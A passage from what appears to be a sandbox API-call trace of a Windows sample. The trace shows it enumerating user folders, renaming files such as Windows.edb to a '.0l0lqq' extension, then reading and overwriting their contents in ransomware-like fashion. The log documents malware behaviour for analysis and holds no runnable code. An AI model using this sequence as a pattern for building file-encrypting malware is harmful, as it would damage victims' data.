hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.235] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0250.235] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.235] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.235] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.236] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.236] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.236] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0250.236] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0250.236] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0250.236] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.237] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.237] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.238] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0250.238] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0250.238] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0250.238] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 0 [0250.250] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.250] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.250] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0250.250] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.251] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.251] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.253] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.253] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0250.253] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.253] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0250.253] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.254] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 1 [0250.254] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x636c8c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x19c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0250.254] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0250.256] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0250.279] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm", lpFilePart=0x0) returned 0x51 [0250.385] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg", lpFilePart=0x0) returned 0x3e [0250.519] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\System Tools\\Windows Easy Transfer.lnk", lpFilePart=0x0) returned 0x6b [0250.541] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", nBufferLength=0x105, lpBuffer=0x26d784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html", lpFilePart=0x0) returned 0x54 [0250.545] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html" (normalized: "c:\\users\\all users\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-report.html.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\windows\\power efficiency diagnostics\\energy-report.html.0l0lqq")) returned 1 [0250.550] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-trace.etl", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Windows\\Power Efficiency Diagnostics\\energy-trace.etl", lpFilePart=0x0) returned 0x52 [0250.591] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb", nBufferLength=0x105, lpBuffer=0x26d904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb", lpFilePart=0x0) returned 0x49 [0250.591] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d904, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq", lpFilePart=0x0) returned 0x50 [0250.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dd64) returned 1 [0250.591] GetFileAttributesExW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\windows.edb"), fInfoLevelId=0x0, lpFileInformation=0x26dde0 | out: lpFileInformation=0x26dde0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x29612a20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29612a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x42291130, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x4810000)) returned 1 [0250.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dd60) returned 1 [0250.591] MoveFileW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\windows.edb"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\windows.edb.0l0lqq")) returned 1 [0250.612] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dce8) returned 1 [0250.612] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\windows.edb.0l0lqq"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x538 [0250.612] GetFileType (hFile=0x538) returned 0x1 [0250.612] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dce4) returned 1 [0250.612] GetFileType (hFile=0x538) returned 0x1 [0250.612] ReadFile (in: hFile=0x538, lpBuffer=0x7d91018, nNumberOfBytesToRead=0xa00000, lpNumberOfBytesRead=0x26dd84, lpOverlapped=0x0 | out: lpBuffer=0x7d91018*, lpNumberOfBytesRead=0x26dd84*=0xa00000, lpOverlapped=0x0) returned 1 [0250.859] CloseHandle (hObject=0x538) returned 1 [0251.568] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq", lpFilePart=0x0) returned 0x50 [0251.568] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dcdc) returned 1 [0251.568] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\windows.edb.0l0lqq"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0251.568] GetFileType (hFile=0x558) returned 0x1 [0251.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dcd8) returned 1 [0251.568] GetFileType (hFile=0x558) returned 0x1 [0251.568] WriteFile (in: hFile=0x558, lpBuffer=0x90c1018*, nNumberOfBytesToWrite=0xa00000, lpNumberOfBytesWritten=0x26dd80, lpOverlapped=0x0 | out: lpBuffer=0x90c1018*, lpNumberOfBytesWritten=0x26dd80*=0xa00000, lpOverlapped=0x0) returned 1 [0251.781] CloseHandle (hObject=0x558) returned 1 [0252.253] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq", nBufferLength=0x105, lpBuffer=0x26d7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq", lpFilePart=0x0) returned 0x50 [0252.253] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26dcdc) returned 1 [0252.253] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Windows.edb.0l0lqq" (normalized: "c:\\users\\all users\\microsoft\\search\\data\\applications\\windows\\windows.edb.0l0lqq"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x558 [0252.253] GetFileType (hFile=0x558) returned 0x1 [0252.253] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26dcd8) returned 1 [0252.253] GetFileType (hFile=0x558) returned 0x1 [0252.254] SetFilePointer (in: hFile=0x558, lDistanceToMove=0, lpDistanceToMoveHigh=0x26dcb0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x26dcb0*=0) returned 0x4810000 [0252.254] WriteFile (in: hFile=0x558, lpBuffer=0x6ff9ee8*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x26dd54, lpOverlapped=0x0 | out: lpBuffer=0x6ff9ee8*, lpNumberOfBytesWritten=0x26dd54*=0xa, lpOverlapped=0x0) returned 1 [0252.255] CloseHandle (hObject=0x558) returned 1 [0252.584] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0252.584] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects", lpFilePart=0x0) returned 0x46 [0252.584] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\", lpFilePart=0x0) returned 0x47 [0252.584] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Search\\Data\\Applications\\Windows\\Projects\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27e6af80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x27eb7240, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x27eb7240, 